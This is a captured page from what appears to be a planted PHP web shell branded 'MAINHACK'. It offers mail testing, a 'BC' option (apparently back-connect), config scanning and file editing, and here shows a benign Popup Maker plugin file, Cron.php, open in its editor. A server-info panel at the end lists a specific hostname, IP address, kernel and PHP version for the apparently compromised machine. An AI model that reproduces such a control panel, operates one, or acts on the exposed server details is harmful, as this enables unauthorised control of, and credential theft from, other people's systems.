[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Cron.php
<?php /******************************************************************************* * Copyright (c) 2019, Code Atlantic LLC ******************************************************************************/ if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Class PUM_Utils_Cron * * @since 1.8.0 */ class PUM_Utils_Cron { /** * PUM_Utils_Cron constructor. */ public function __construct() { add_filter( 'cron_schedules', [ $this, 'add_schedules' ] ); add_action( 'wp', [ $this, 'schedule_events' ] ); } /** * Registers new cron schedules * * @param array $schedules * * @return array */ public function add_schedules( $schedules = [] ) { // Adds once weekly to the existing schedules. $schedules['weekly'] = [ 'interval' => 604800, 'display' => __( 'Once Weekly', 'popup-maker' ), ]; return $schedules; } /** * Schedules our events */ public function schedule_events() { $this->weekly_events(); $this->daily_events(); } /** * Schedule weekly events */ private function weekly_events() { if ( ! wp_next_scheduled( 'pum_weekly_scheduled_events' ) ) { wp_schedule_event( current_time( 'timestamp' ), 'weekly', 'pum_weekly_scheduled_events' ); } } /** * Schedule daily events */ private function daily_events() { if ( ! wp_next_scheduled( 'pum_daily_scheduled_events' ) ) { wp_schedule_event( current_time( 'timestamp' ), 'daily', 'pum_daily_scheduled_events' ); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server.dijitaldukkanim.com.tr
Server IP: 104.247.168.220
PHP Version: 8.1.33
Server Software: Apache
System: Linux server.dijitaldukkanim.com.tr 4.18.0-553.105.1.el8_10.x86_64 #1 SMP Tue Feb 17 05:17:39 EST 2026 x86_64
HDD Total: 492.3 GB
HDD Free: 180.64 GB
Domains on IP: N/A (Requires external lookup)
System Features